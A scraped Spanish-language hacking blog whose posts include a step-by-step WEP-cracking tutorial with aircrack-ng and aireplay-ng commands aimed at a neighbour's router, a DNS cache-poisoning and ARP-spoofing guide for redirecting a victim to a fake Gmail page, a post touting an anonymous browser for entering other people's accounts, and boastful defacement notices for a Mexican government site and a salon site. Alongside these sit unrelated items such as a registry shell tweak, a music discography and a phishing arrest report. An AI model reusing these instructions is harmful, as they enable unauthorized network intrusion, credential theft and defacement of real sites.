despues que le hayan dado clic a Compile Script seban a file y le ponen guardar como (save as...) y lo guardan con nombre.exe yo lo puse LIR.exe ejemplo.

Despues se van a inicio y despues en ejecutar. y ponen regedit y aceptar. ejemplo:

Despues le saldra un cuadro le dan clic a HKEY_LOCAL_MACHINE ejemplo:

Despues le dan clic en SOFTWARE ejemplo:

Despues le dan clic en Microsoft ejemplo:

Despues le dan clic a Windows NT ejemplo:

Despues le dan click a CurrentVersion ejemplo:

Despues habren winlogon y le dan click a shell ejemplo:

ya por ultimo cuando le picas a shell te va salir un cuadro y nomas pones el nombre es decir el nombre como le pusiste al boton. yo le puse LIR.exe ejemplo:

ya de ahi reinician la computadora y les aparecera su boton con lo que le pusieron.

Por si quiere volver a poner el inicio, es muy sencillo se van a inicio
ejecutar y le ponen regedit despues seban a shell como ya saben y de ahi le cambian es decir, estudes recuerdan que a mi pc le puse de inicio LIR y entonces le puse LIR.exe ahora le vamos a cambiar
explorer.exe y listo es todo le damos aceptar y reiniciamos la computadora. ejemplo:

Resource HackerTM DESCARGA:
http://delphi.icm.edu.pl/ftp/tools/ResHack.zip

Screen de mi pc =D:

Minimanual "Crackeando una red Wifi"

2008-10-15T17:42:00.000-07:00

Minimanual "Crackeando una red Wifi"

Bueno pues aqui les va mi primer tutorial para diosdelared, este tuto hablara sobre la funcion basica de una red wifi algunas definiciones y como poder obtener una clave wep ,NO ME HAGO RESPONSABLE DEL DANO QUE PUEDEN PROBOCAR CON ESTA INFORMACION ,USENLA PARA PROTEGER SU RED :-*(si como no..)

Me e basado en algunas definiciones que se pueden encontrar tanto como en google como en wikipedia

~~INICIO~~

INDICE
1 Informacion basica sobre WI-FI
2 Definiciones
3 Preparacion de un equipo
4 Ejemplo de un Ataque a un AP y obtener la clave wep
5 FIN

1 Informacion basica sobre WI-FI
Primero antes que nada dare una breve explicaciones de que es wifi y algunos de sus estandares y su Seguridad

WI-FI Estandar IEEE802.11:

IEEE802.11b y 802.11g
Estos estandares disfrutan de una aceptación internacional debido a que la banda de 2.4 GHz está disponible casi universalmente, con una velocidad de hasta 11 Mbps y 54Mbps.

IEEE802.11a
con el nombre de WIFI5 que opera a 5 GHz y que disfruta de una operatividad con canales relativamente limpios. La banda de 5 GHz ha sido recientemente habilitada y, además no existen otras tecnologías (Bluetooth, microondas, ZigBee, WUSB) que la estén utilizando, por lo tanto existen muy pocas interferencias. Su alcance es algo menor que el de los estándares que trabajan a 2.4 GHz (aproximadamente un 10%), debido a que la frecuencia es mayor. (a mayor frecuencia, menor alcance).

IEEE 802.11n
Trabaja a 2.4 GHz a una velocidad de 108 Mbps. Sin embargo, el estándar 802.11g es capaz de alcanzar ya transferencias a 108 Mbps, gracias a diversas técnicas de aceleramiento. Actualmente existen ciertos dispositivos que permiten utilizar esta tecnología, denominados Pre-N.

Seguridad:

Actualmente existen tipos de protocolo para el estandar WI-FI que manejan informacion cifrada ,los mas usados son WEP y WAP

WEP:(Wired Equivalent Privacy),este cifra los datos de una red de forma que el destinario que hizo la peticion reciba la informacion .Maneja encriptaciones de 64bits ,128bits y los dispositivos nuevos manejan 256bits,WEP codifica los datos con una "clave"que le fue asignada ,antes de enviar los datos al destinatario.

WAP:presenta mejoras como generación dinámica de la clave de acceso. Las claves se insertan como de dígitos alfanuméricos, sin restricción de longitud

WPA2:Es una mejora del protocolo WPA,para los estandares 802.11g que trae casi todas las mejor del WPA ,este usa cifrado AES (Advanced Encryption Standard),actualmente WPA2 es el mas"seguro" de las encriptacion protocolos de las redes WI-FI.

Otro tipo de seguridad de una red WI-FI
Autoindentifcacion VPN: En este caso puede ser mediantes la autenticacion o autorizacion de usuarios.

Filtracion de Mac:Solo permite acceso ala red aquellos dispositivos registrados.

Ocultar el ESSID o punto de acceso:Se puede ocultar el nombre del punto de acceso (router)de manera que sea invisible y tenga que ser registrado manualmente.

esto fueron algo breve sobre como trasmite de los estandares y los protocolos que usa WI-FI

2 DEFINICIONES

Pronde algunas de las definiciones para los que andan un poco perdidos entre tantos tecnisismos xD

*WI-FI:Fidelidad Inalambrica(Wireless Fidelity)
*IEEE:Instituto de Ingenieros Eléctricos y Electrónicos(The Institute of Electrical and Electronics Engineers)
*AP:Punto de Acceso(Access Point)
*Mbps:Megabits por Segundo
*Protocolo: es el conjunto de reglas que especifican el intercambio de datos u órdenes durante la comunicación entre las entidades que forman parte de una red
*WEP:Privacidad Equivalente a Cableado(Wired Equivalent Privacy)
*WPA:Proteccion de Acceso por WI-FI
*Direccion Mac: dirección de control de acceso al medio (Medium Access Control address)

---
*Live-CD:CD en vivo , es un disco que puede ser booteado y usado desde el mismo cd sin ser instalado ,todo se ejecuta desde la la lectora y la memoria ram , la desventaja es que no se podran guardar los cambios realizados.
*DHCP:Protocolo de Configuración Dinámica del Host

bueno , esas fueron alguna de las definiciones mas comunes,que se usan en las redes wifi.

3 PREPARACION
Ahora prepararemos nuestro equipo para instalar las herramientas , antes que nada ,le recomiendo que esto lo hagan en linux , porque les digo esto , porque las targetas wireless son mas compatibles y las herramientas y los drivers para linux estan mas obtimizadas y actualisados que en Win.

En caso de no contar con algun sistema GNU/LINUX ,hay varios LIVE-CD listo y preparados para auditoria wireless, con los driver y las herramientas ya instaladas,se pueden usar tanto como en un cd-rom com en un Pendriver o memoria usb.como no nos gusta complicarnos la vida y batallar en configurar la targeta,instalar los driver,instalar los programas y verificar si funciona correctamente usaremos un algun live cd ya preparado xD
los mas recomendados son:

WIFISLAX

"Wifislax esta basado básicamente y principalmente en SLAX (basado en la distribución Slackware Linux), pero debido al gran trabajo realizado por los autores del BackTrack hemos trabajado directamente sobre este ultimo live CD, así pues catalogar al Wifislax como una live CD podría incluso considerarse como erróneo. También están disponibles todos los scripts y códigos fuente, los cuales pueden ser utilizados para construir tu propio live CD."

Pagina Oficial: www.wifislax.com

Descarga Version 3.1

Backtrack

Backtrack es uno de las mas valoradas distribuciónes linux live centrado en las pruebas de penetración. Sin instalación alguna, la plataforma de análisis se inicia directamente desde el CD-Rom y es totalmente accesible y usable en cuestión de minutos.

Pagina Oficial: http://www.remote-exploit.org/backtrack.html

Descarga version 3.0

esa son algunas de las distribuciones mas usadas, claro que que hay mas pero solo pongo esas porque son las que tienen mas soporte.

La que use yo fue wifislax porque , por el simple hecho de que las personas que hacen wifislax ,hablan en espanol y es mas facil familiarizarse con este distro.

4 Ejemplo de un Ataque a un AP y obtener la clave wep

Bueno ahora manos a la obra , aremos un ataque simple de falsa autentificación por no tener clientes conectados,despues asociacion ,sigue con reinyeccion de trafico y ataque "chopchop".

Yo usare para este ejemplo una targeta PCIMCIA model a5006eg chipset atheros ,cabe recalcar que no todas las targetas wireles tienen el mismo resultado y algunas no son compatibles.

Bueno ahora sabemos lo que haremos , bien seguimos con bootear nuestro live-cd yo en mi caso usare wifislax 3.1 ,bueno en caso de que no sepas solo entras ala BIOS de tu pc y pones como primer arranque tu lectora,en caso que surga un problema al bootear o se congele el ordenador al cargar el live-cd ,puede que tenga un problema al detectar una parte de nuestro hardware ,bien entonces si te sucede necesitas agregar un comando llamado "cheatcode"en el menu de inicio de wifislax
pagina de lista de cheatcodes:http://wifislax.com/manuales/cheatcode.php

Ahora bien ya que nos pida identificarno (user y pass) nos logueamos como root

Código:

user:root
pass:toor

y acontinuacion escribes

Código:

startx

se abrira una interfaz grafica

Bien , tendremos nuestro sistema wifislax cargado en nuestra pc , ahora sigue un paso importante , verificar que nuestra targeta wireles aya sido detectada , para eso abrimos la consola y tecleamos

Código:

iwconfig

bueno en la shell aparece que mi targeta

me aparesera como "ath0" ese sera el nombre del interfaz de mi targeta

ahora seguimos con activarla en modo monitor nuestra targeta, en mi caso por usar una targeta con chipset atheros sigo esta ruta

ya que mi targeta tiene chipset atheros
o si no escribe

Código:

iwconfig interfaz mode monitor
(iwconfig ath0 mode monitor)

ahora tenemos que cambiar nuestra direccion mac para que sea mas facil a la hora de identificarla o que no nos metamos en problemas xD ,primero tenemos que dejar modo bajo o desactivada para poder cambiar la mac por una que le asignemos ahora escribe esto en la terminal:

Código:

ifconfig interfaz down
(ifconfig ath0 down)

ahora cambiaremos la mac nuestra por otra :

Código:

macchanger -m XX:XX:XX:XX:XX:XX interfaz
(macchanger -m 00:11:22:33:44:55 ath0)

ahora volvemos a subir o activar nuestra targeta

Código:

ifconfig interfaz up
(ifconfig ath0 up)

bueno ahora seguimos ,tenemos que buscar un AP como "victima" , aqui en Mexico la mayoria de la gente cuenta con INFINITUM , que al contratar les dan un router preconfigurado con una simple clave de 64 bits ,y unos de los mas faciles de reventar :P

Si tienes la mac y el ESSID de la victima puedes saltarte este paso ,si no escribe este comando en la shell, hay muchas formas de obtener la mac o essid de un AP , yo personalmente uso este por que me da ,todo la info ,como el canal,el nombre,que encriptacion tiene,direccion mac y los clientes que tiene conectado.

Código:

airodump-n interfaz
(airodump-ng ath0)

bien ahorita ya tenemos el nombre , la mac y el canal del AP ,ahora podemos cerrar la ventana

ahora tenemos que "capturar" todo lo que entra y sale de esa red , pero como bien dije en este caso este AP no cuenta con clientes conectado , entonces intentaremos asociarnos

primero escribimos:

Código:

airodump-ng -w dato_a_reconoser -c canal
(airodump-ng -w victima -c 2)

con eso estaremos guardando todo en victima.cap donde se almacenara los data
bien ahora nos asociaremos con el AP , por no haber clientes conectados , SIN CERRAR LA OTRA VENTANA ABRIMOS OTRA y escribimos.

Código:

aireplay-ng -1 0 -e ESSID_victima -a mac_victima -h tu_mac interfaz
(aireplay-ng -1 0 -e INFINITUM7203 -a 00:1E:C7:8A:25:89  -h 00:11:22:33:44:55 ath0)

bueno , en caso de suelte un mensaje que no se puede asociar puede ser poque ,el AP tiene filtro de mac o estas muy lejos o algun dato no esta correcto .con eso ya obtendremos data pero de una forma muy lenta entonces reinyectaremos trafico y asi poder obter datas mas rapido, entonces escribimos:

Código:

aireplay-ng -3 -b mac_victima -h tu_mac interfaz
(aireplay-ng -3 -b 00:1E:C7:8A:25:89 -h 00:11:22:33:44:55 ath0)

entonces estaremos obteniendo datas mas rapido(en mi caso de 300 a 400/Segundo) ,ahora solo queda esperar , por lo regular yo espero a 20,000 datas para pasarlo por aircrack despues de ahi lo intento cada 5,000

bueno ahora aremos el ataque chopchop xD, escribimos en la terminal

Código:

aircrack-ptw -z dato_a_reconoser.cap
(aircrack-ptw - victima-01.cap)

y BINGOO!

por lo regular con 18mil se obtiene la clave wep de 64bits y con 48mil datas se obtienen las de 128bits
bueno en caso de que no la encuentre seguimos y probado cuando sume los sig. 5000 , hasta encontrarla nos soltara la clave en HEX y ASCCI.:P

y ahora a conectarse!, ahi ya es cosas de ustedes lo que haran , con este concluyo este minimanual creado por c0d3 para diosdelared. parte de la informacion fue sacada de wiki ;D
5 FIN
Se aceptan sugerencia , y son libres de copiar y pegar , pero con los creditos xD y espero que les haya servido y aunque solo a 1 le funciones con eso me conforme , no soy un experto en el tema pero en lo que este a mi alcanse les ayudos -.-

Se pintan casas a domicilio??

2008-10-15T17:35:00.000-07:00

yo que pensaba llevarle mi casa para que la pinte U_U

Nokia 1100 Vs Iphone

2008-10-15T17:30:00.000-07:00

Detenido phisher rumano por estafar 700.000 dólares

2008-10-15T14:12:00.000-07:00

Detenido phisher rumano por estafar 700.000 dólares

El estafador cibernético fue extraditado a EE.UU desde España.

Sophos ha informado de la detención de un phisher rumano de 22 años, acusado de robar 700.000 dólares de unas 7.000 personas

El método utilizado por Sergio Daniel Popa, que así se llama el ciberdelincuente, fue a través de ataques de phishing con envíos masivos de correos electrónicos y supuestamente remitidos por entidades financieras, incluyendo PayPal y Citibank. Ahora se enfrenta a 10 años de cárcel y una multa de 500.000 dólares.

Según fuentes, redirigía a sus víctimas llevándoles a sitios web falsos y les engañaba para que revelaran datos personales, tales como el número PIN, nombre, dirección, cuenta bancaria y números de tarjetas de crédito o de la seguridad social. En definitiva, datos que podía usar para su propio beneficio económico.

“Las autoridades han realizado un gran trabajo con este caso llevando a Popa a enfrentarse ante un tribunal", afirma Graham Cluley, Consultor de tecnología de Sophos. “Tristemente, todavía existen muchos otros criminales que se aprovechan de inocentes usuarios de Internet a los que le roban su identidad por su imprudencia".

Según ciertas informaciones, Popa también vendía “phishing kits" con instrucciones de cómo falsificar tarjetas de crédito. Expertos de Sophos ven cómo este ciberdelincuente tiene una alta opinión de su posición dentro del hampa criminal, tal y como se evidencia en un correo electrónico que envió a un socio en enero de 2005:

“Escuche con atención, soy un acreditado [sic] profesional del hampa. He realizado numerosas estafas e información de tarjetas de crédito. Puedo también conseguir créditos y dinero en efectivo de cajeros automáticos. Cobro por mis servicios, pero soy un gran proveedor de todo".

fuente:
http://diarioti.com/gate/n.php?id=19804

Acunetix.Web.Vulnerability.Scanner.v5.1

2008-10-14T18:50:00.001-07:00

¿Es su Web site hackable? Acunetix Web Vulnerability Scanner explora automáticamente sus usos/Web site (carros de compras, formas, contenido dinámico, etc.) de la tela para las vulnerabilidades a la inyección del SQL, sitio cruzado scripting, el cortar de Google y otros ataques de la tela. Los hackers están concentrando sus esfuerzos en Web site: ¡los 75% de ataques del cyber se lanzan en usos de la tela! ¡Explore su Web site hoy y las vulnerabilidades del hallazgo antes de que lo hagan los hackers!

DESCARGA

Tienes seguridad en internet??

2008-10-14T17:13:00.000-07:00

10 puntos para saver si tienes seguridad en internet

1) ¿Usa cortafuegos?

2) ¿Está al día con las actualizaciones automáticas de Windows Update?

3) ¿Entra periódicamente en la página de WindowsUpdate a revisar su situación?

4) ¿Usa un usuario Normal, no Administrador para cualquier conexión a Internet?

5) ¿Borra directamente todos los mensajes con ficheros adjuntos que no sean de datos?

6) Nunca ejecuta software dudoso. Es decir, todo el software instalado es con los CD's originales del fabricante o con las actualizaciones de su propia página web.

7) Si una determinada funcionalidad requiere configurar el cortafuegos, ¿se informa de cómo hacerlo en vez de desactivarlo?

8) Si usa herramientas de Office ¿tiene desactivado el Usar macros automáticamente?. Si no lo ha reconfigurado, éste es el valor por defecto.

9) Nunca uso herramientas P2P como Kazaa, eMule o eDonkey.

10) Procuro usar un antivirus actualizado a pesar que soy consciente que nunca me salvará de los virus nuevos.

Con un total de 10 puntos...si estarias seguro.A menos puntos menos seguridad tendrás.

by: Xoptik

Genitallica Discografia.

2008-10-14T05:41:00.000-07:00

La discografia de Genitallica, banda mexicana que fusiona Punk, Rock, Ska, Hip Hop, Mariachi, Reggae y demases..

Integrantes:

Beno - Lic. Benito Alberto Martinez De La Garza
Antulio - Lic. Antulio Enrique Espinosa Gonzalez
Andres - Lic. Andres Alejandro Saenz Cantú
Gil - Gildardo González Montemayor
Gallo -Arq. Gerardo Antonio Olivares Saro

Discografía:

Picas O Platicas (2000)

tracklist:
01. Fizbe Para Todos
02. Todos Tomados
03. Capitán Peligro
04. Imagina
05. Chiquitita
06. Brigitte (Flojita Y Cooperando)
07. Mi Amigo
08. El Vato
09. Pohs'
10. Super Mal
11. (...Det Var Skibet!)(...Det Var Skibet!)
12. Zorra
13. ¿Por Qué Niño Por Qué?
14. ¿Qué Fue Lo Que Pasó?
15. Paz-Zone
16. Quiero Paz
17. El Distribuidor
18. Super Genital
19. Mi THC

DESCARGA AQUI

Sin Vaselina (2002)

tracklist.
01. Préndelo
02. Sin Semilla
03. Borracho
04. Otra Vez
05. 18 Pack
06. Después
07. El Tiempo
08. Funeral Reggae
09. Trasero
10. Preséntamela
11. No Tengo Amigos
12. Hasta Morir
13. El Perro De Mi Primo
14. No Digo Nada
15. Vale Verga
16. Sadomasoquista
17. Piensa Diferente
18. Hacerlo Bien

DESCARGA AQUI

Consexcuencias (2005)

tracklist:
01. Aa
02. Dicen Que Soy
03. Teléfono
04. Lástima
05. Ya Nada Es Igual
06. Una Noche Más
07. Cuando Me Veas Venir
08. Tócate
09. Pensándolo Bien
10. Muertos Pero Contentos
11. El Burro Sin Mecate (con Grupo Marrano)
12. Trasero (con Banda El Recodo)

DESCARGA AQUI

Pohtoshop portable

2008-10-14T05:36:00.000-07:00

para aquellos diseñadores que luego van a cyber y no tienen photoshop instalado esta es la mejor opcion =D Photoshop Portable sele pueden agregar brushes, y demas plug's

Servidor RS:
DESCARGA AQUI

XeroBank Browser (Navegador Anonimo)

2008-10-13T21:44:00.000-07:00

XeroBank Browser o xB Browser es un navegador open source basado en Firefox que aclama ser el mas seguro a la hora de proteger la privacidad del usuario. Utiliza dos redes de anonimato, TOR y XeroBank, convinandolo con algunas extensiones del Firefox como NoScript y Adblock asegura una navegación completamente anónima con conexiones encriptadas y seguras, tiene la característica de no dejar ningún rastro de su uso en nuestra PC.

usando un ordenador se conecta a la red comparte información sobre la dirección que está siendo utilizada por el usuario, esto es así para que los pedidos de información sean realizados de manera correcta, como así también el intercambio de certificados, etc.
Pero la red Tor intenta detener el tráfico de información que se realiza. Para ello lo primero que hace es encriptar el tráfico entre el ordenador y la red de routers de Tor. Esto hace que sea mucho mas difícil espiar a los usuarios que utilizan xBrowser. Luego, la red de Tor cambia de manera regular la dirección IP de los usuarios, lo que hace casi imposible que estos puedan ser ubicados.
Algunas de Las ventajas de xB Browser son:
-Navega totalmente anonimo
-Mejora muchisimo la seguridad
-Cambia automaticamente la IP o con un simple click
-No deja rastros en la pc donde se utilizo
-Es Open source
-Es portable
-No requiere configuración ni instalación

Obiamente el navegador tiene sus desventajas:
-Es muuchooo mas lento que el firefox normal
-No permite entrar en algunas webs
-No permite ejecutar firefox al mismo tiempo

En fin.. un programa muy util para tener en la pc y en el pendrive siempre, puede ser utilizado para miles de actividades, por ejemplo para ingresar a una cuenta de correo de otra persona o cualquier tipo de cuenta que no sea nuestra (sera casi imposible que nos descubran), para descargar de webs como rapidshare o megaupload. Para testear cuentas de ciertas webs, antes de ingresar desde su correspondiente pais y realizar "acciones" (solo para entendidos $ jaja), para ingresar en alguna web bloqueada en cierta pc o red de trabajo, para ingresar en webs en una red wi fi no segura, y un largo etc.

Tambien hay que tener en cuenta que es portable, se lo puede guardar en un pendrive o mp3 y llevarlo a un ciber cafe o al trabajo y navegar seguros y anonimos.

Para usar el programa se bajan el instalador y lo instalan, deben seleccionan la red TOR, despues lo pueden mover directamente a su pendrive, para usarlo desde otra pc.

Descarga:

web oficial.

Owned http://www.consejodeseguridad.gob.mx/index.html

2008-10-13T20:05:00.000-07:00

Owned... C.I.C

[H]acked By No[F]eck [S]ecurity OFF
Cyber Inteligencia Criminal

link: http://www.consejodeseguridad.gob.mx/index.html

[Y]ou Are [T]he mother [F]ucker

[G]reetz:[G]othic-x - [A]gent - [N]exus

Owned http://www.stadtfriseur.at/

2008-10-13T19:48:00.000-07:00

Owned... C.I.C

[H]acked By No[F]eck [S]ecurity OFF
Cyber Inteligencia Criminal

link: http://www.stadtfriseur.at/

[Y]ou Are [T]he mother [F]ucker

[G]reetz:[G]othic-x - [A]gent - [N]exus

DNS Poison "El verdadero arte" by MurdeR

2008-10-13T17:13:00.000-07:00

----------------------------------------
~= DNS Poison & Spoof by MurdeR =~
----------------------------------------
Para el foro: www.diosdelared.com
----------------------------------------
"La potencia sin control no sirve de nada"
----------------------------------------

~~~~~~~~~~~~~~~~~~~~~~~~~~
Intro:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Muchos me han preguntado que es en realidad el DNS Poisoning, si editar el hosts de windows es envenenar los dns, y la gran mayoría ha admitido no saber bien que es y en qué consiste esta tecnica.

Entre la diversidad de ataques orientados a suplantar una IP de un dominio por otra, la gran mayoría apuntan directamente al DNS server. Como ya sabrán el DNS Server es el ecargado de traducir los dominios a IPs o viceversa, por lo tanto si podemos suplantar o evenenar el dns server primario de una maquina, tendremos total control sobre lo que dicha maquina ve como resultado a su petición.

La utilidad de suplantar o envenenar un dns server puede ser muy variada, puede servir para robar datos de login y así poder controlar el panel de administración de la "victima", puede servir para robar datos sensibles y así conseguir dinerito extra, puede servir para muchisimas cosas y en todos los casos cosas malas xD

La diferencia principal entre el DNS Poisoning y la sustitución de dns en la "victima" es que NO necesitamos utilizar un virus para infectar la maquina "victima" y así nos evitamos las complicaciones de la ingeniería social, los antivirus, programar un code, etc.

Ya que el pete de reberto se niega a aprender-.- les hago un tuto intentando explicar bien que es y como efecutar DNS Caché Poison y DNS ID Spoof.
Aclaro que esto no es una guía paso a paso de como efectuar el ataque, si diré cuales son las herramientas y cual es el metodo del ataque, pero ustedes mismos deberán aprender a usar las herramientas y a efectuar el ataque.

~~~~~~~~~~~~~~~~~~~~~~~~~~
Funcionamiento de los DNS Servers:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Primero y muy importante es comprender como funcionan los servidores de DNS y para esto no queda otra que la teoría, la cual haré lo más amena posible con ejemplos tontos de los mios :P

-DE DOMINIO A IP-
Como sabran en internet todas las maquinas conectadas se comunican entre ellas por la IP, es obvio esto pero es importante tenerlo claro. Cuando escribimos en el navegador www.google.com, nuestra maquina le pedirá a nuestro DNS Server (el que seguramente nos proporciona el ISP) la IP de google.com, este al no saber cual es la IP (pq no puede almacenar todas las IPS de todos los dominios), "leerá" la configuración de google.com y de allí obtendrá cual es el DNS server responsable de dicho dominio (similar a cuando hacemos un whois), en segundo paso contactará a dicho server y le preguntará cual es la IP de google.com, al recibir respuesta nos conectaremos directamente a la IP.

[Pepe] --> cual es la ip de google? --> [DNS de Pepe]
[DNS de Pepe] --> cual es el dns server de google.com --> [whois server]
[DNS de Pepe] <-- el server de google.com es "[DNS de google.com]" <-- [whois server]
[DNS de Pepe] --> cual es la ip de google? --> [DNS de google.com]
[DNS de Pepe] <-- la ip de google es 64.x.x.x <-- [DNS de google.com]
[Pepe] <-- la ip de google es 64.x.x.x <-- [DNS de Pepe]
[Pepe] --> mostrame google.com --> [64.x.x.x]
[Pepe] <-- tomá google.com <-- [64.x.x.x]

Con ejemplo debería quedar claro como funciona más o menos y sin muchos tecnisismos todo el temita :P

-SOBRE LA AUTORIDAD-
Se denomina DNS autoritario a los servidores que tienen "permiso" para resolver directamente (sin preguntarle a otro dns server) determinado dominio. Es importante saber esto pq si hacemos un DNS trucho que se crea autoritario y que responda por el dominio a "atacar" o bien spoofeamos unas cabeceras para atender una respuesta que le hicieron a otro server podremos suplantar a dicho dominio.
El DNS trucho autoritario es el que se usa normalmente en la tecnica "True poison" que en realidad no es más que la suplantación mediante virus del dns server de una maquina concreta.

-SOBRE LA CACHÉ-

Para no estar haciendo todo el lio anteriormente explicado, ya que pepe y muchisimas otras personas visitan con frecuencia google.com, el dns de pepe tiene una cosita que se llama caché, que es una especie de base de datos propia en la que puede guardar las ips a las que apuntan determinados dominios, esta caché está configurada para actualizarce cada determinado tiempo.. en algunos servidores cada media hora, en otros cada 12 horas y en otros cada 24 horas... incluso más.
Ya se van haciendo una idea de como va el caché poisoning, si nos topamos con que determinado dns no tiene almacenado nada relativo a un dominio en concreto y conseguimos engañarlo... tendremos un buen margen de tiempo envenenada la caché con una resolución falsa :P

-SOBRE EL ZONE TRANSFER-

Otra cosa importante que hay que saber es que es y para que sirve el Zone Transfer, basicamente el zone transfer consiste en que cuando un server le pregunta a otro, que es se supone autoridad de determinado dominio, cual es la ip de ese determinado dominio el segundo le devolverá la ip de ese dominio más un monton de otros dominios de los cuales es autoridad, de esta forma quedan almacenado en la caché del primero todos los dominios de los que el segundo es autoridad. Ya es liante así explicado, mejor veamoslo en el ejemplo de pepe, centrmonos en lo remarcado en negrita:

[Pepe] --> cual es la ip de google? --> [DNS de Pepe]
[DNS de Pepe] --> cual es el dns server de google.com --> [whois server]
[DNS de Pepe] <-- el server de google.com es "[DNS de google.com]" <-- [whois server]
[DNS de Pepe] --> cual es la ip de google? --> [DNS de google.com]
[DNS de Pepe] <-- la ip de google es 64.x.x.x & la ip de google.es es 65.x.x.x & la ip de google.uk es 67.x.x.x<-- [DNS de google.com]
[Pepe] <-- la ip de google es 64.x.x.x <-- [DNS de Pepe]
[Pepe] --> mostrame google.com --> [64.x.x.x]
[Pepe] <-- tomá google.com <-- [64.x.x.x]

Como verán el dns de pepe solo preguntó por la ip de google.com, sin embargo el dns de google le respondio con la ip de google.com y de todos los demás dominios sobre los que es autoridad. Automaticamente el dns de pepe guardará esos datos en su caché por si alguien le pregunta por ellos.

~~~~~~~~~~~~~~~~~~~~~~~~~~
1º Ataque: DNS Caché Poison
~~~~~~~~~~~~~~~~~~~~~~~~~~

Recordando la teoría sobre el caché y el zone transfer paso directamente a explicar un ataque con el ejemplo de Pepe y su enemigo un hacker malo llamado Zer0 z0orG xD

Zer0 z0orG que se lleva muy mal con pepe decide ownearle su correo electronico gmail para despues robarle su dominio y borrarle la página.. primero intenta enviandole un troyano pero no cuela pq pepe usa nod32 full update :P
Entonces Zer0 z0orG decide sacar a relucir sus amplios conocimientos de juanking y efecutar un ataque directo al dns server de Pepe. Para el que pregunte como carajo sabe cual es el dns server de pepe... sabe que pepe usa telefonica como isp y telefonica solo tiene 2 dns servers uno primario y uno secundario para sus clientes.

Requisitos para el ataque:
Un servidor dedicado (su pc pedorro con debian instalado).
Un dominio (hackermalo.com).
Un dns server instalado en el dedicado (bind9).

Primer paso: -Configurar un dominio-
Para que funcione este ataque Zer0 z0orG necesita configurar su dominio para que tenga como autoridad al dns server que instalará en su servidor.
Para ello simplemente se va a godaddy.com (donde compró el dominio) y en DNS Configuration cambia la IP del dns primario por la de su servidor.

Segundo paso: -Instalar y hackear el DNS Server-
El siguiente paso es hacer un apt-get install bind9 y "hackearlo", digo hackearlo pq el tiene que configurar las zonas del dns server recien instalado de modo que se sepa autoridad sobre hackermalo.com, eso es logico, pero además debe configurar un zone para gmail.com y debe también hacer que se "crea" autoridad sobre dicho dominio.
Para el que no tenga ni idea de como va este tema, busquen un tuto sobre configuración de bind :P

Tecer paso: -Server web y Scam-
Ahora Zer0 hace un scam de gmail.con, lo monta en el htdocs de apache y configura el http.conf para que apunte gmail.com a htdocs/gmail-scam/
*Para el que no sabe que shit es un scam: http://www.diosdelared.com/index.php?topic=1451.0

Ultimo paso: -El ataque!-
Ahora Zer0 z0orG entra en su laptop con Windows Vista Home Edition y configura las conexiones de red modificando la parte de DNS Server y mete como primario a "[DNS de pepe]".
Una vez hecho lo anterior lo unico que resta es entrar a hackermalo.com y esperar que la magia suceda.

Y que sucede?

[Zer0 z0orG] --> cual es la ip de hackermalo.com? --> [DNS de Pepe]
[DNS de Pepe] --> cual es el dns server de hackermalo.com --> [whois server]
[DNS de Pepe] <-- el server de hackermalo.com es "[DNS de Zer0 z0orG]" <-- [whois server]
[DNS de Pepe] --> cual es la ip de hackermalo.com? --> [DNS de Zer0 z0orG]
[DNS de Pepe] <-- la ip de hackermalo.com es 192.x.x.x & la ip de gmail.com es 192.x.x.x<-- [DNS de Zer0 z0orG]
[Zer0 z0orG] <-- la ip de hackermalo.com es192.x.x.x <-- [DNS de Zer0 z0orG]
[Zer0 z0orG] --> mostrame hackermalo.com --> [192.x.x.x]
[Zer0 z0orG] <-- tomá hackermalo.com <-- [192.x.x.x]

¡¡¡CACHé ENVENENADA!!! (en teoría si es vulnerable :P)

Y minutos más tarde...

[Pepe] --> cual es la ip de gmail.com? --> [DNS de Pepe]
[DNS de Pepe] mira en su caché y encuentra gmail, obviamente con la IP falsa que le devolvió el [DNS de Zer0 z0orG]
[Pepe] <-- la ip de gmail.com es 192.x.x.x <-- [DNS de Pepe]
[Pepe] --> mostrame gmail.com --> [192.x.x.x]
[Pepe] <-- tomá scam de gmail !! OWNED <-- [192.x.x.x]

~~~~~~~~~~~~~~~~~~~~~~~~~~
Ataque 2: DNS ID Spoofing
~~~~~~~~~~~~~~~~~~~~~~~~~~
En caso de que estemos en la misma red local que [Pepe] o que el [DNS de Pepe] no es necesario realmente armar todo el bardo, es suficiente con efectuar un man in the middle y ponerse a spoofear. No transmitir los mensajes desde el dns de pepe o bien el dns autoritario le envien a pepe o al dns de pepe y falsearlos..

Antes de seguir deben saber efectuar un man in the middle y spoofear paquetes, por suerte MurdeR ya habló de eso en los siguientes posts:
http://www.diosdelared.com/index.php/topic,176.0.html -> Arp Spoof
http://www.diosdelared.com/index.php?topic=9126.0 -> Sniffing + Spoofing de Redes

Volvemos al ejemplo de Pepe y Zer0 z0orG para que resulte mas sencillo:

Zer0 z0orG no pudo ownearse el DNS con su tecnica anterior pq estaba parcheado y no se owneó el mail de Pepe, entonces aprovecha que tiene control sobre un server que está en la misma red local que el [DNS de Pepe] para intentar hacer un Man in The Middle y envenenar a mano la caché! (Zer0 es bien leet eh :O)

Requisitos:
- Acceso y control total (/root) de una maquina en la red local
- hping2 (incluye en teoría arpspoof)

Primer paso:
Zer0 envenena la ARP haciendole creer al [Router] que el [PC OWNED] es en realidad [DNS de Pepe] y haciendole creer a [DNS de Pepe] que el [PC OWNED] es el [Router]:

Activa el forwarding para que todo lo que pase por [PC OWNED] sea retrasmitido automáticamente a su verdadero destinatario:

Citar

[root@PC OWNED Zer0]# echo 1 > /proc/sys/net/ipv4/ip_forward

Y procede a envenenar el ARP:

Citar

[root@PC OWNED Zer0]# arpspoof -t [Router] [DNS de Pepe]
arp reply [DNS de Pepe] is-at [PC OWNED]
arp reply [DNS de Pepe] is-at [PC OWNED]

Citar

[root@PC OWNED Zer0]# arpspoof -t [PC OWNED] [Router]
arp reply [Router] is-at [PC OWNED]
arp reply [Router] is-at [PC OWNED]

Con eso todo lo que envie [Router] a [DNS de Pepe] y viceversa pasará por [PC OWNED] pues hemos efecuado un envenenamiento de ARP.

Segundo paso:
Ahora Zer0 necesitá poner a funcionar un sniffer en tiempo real, en nuestro caso tcpdump con un script que detecte si hay una petición de parte de [DNS de Pepe] al [DNS de GMAIL] y en ese preciso instante de de baja el ip_forwarding:

Citar

[root@PC OWNED Zer0]# tcpdump -vvv -w /dump host [Router] and proto udp

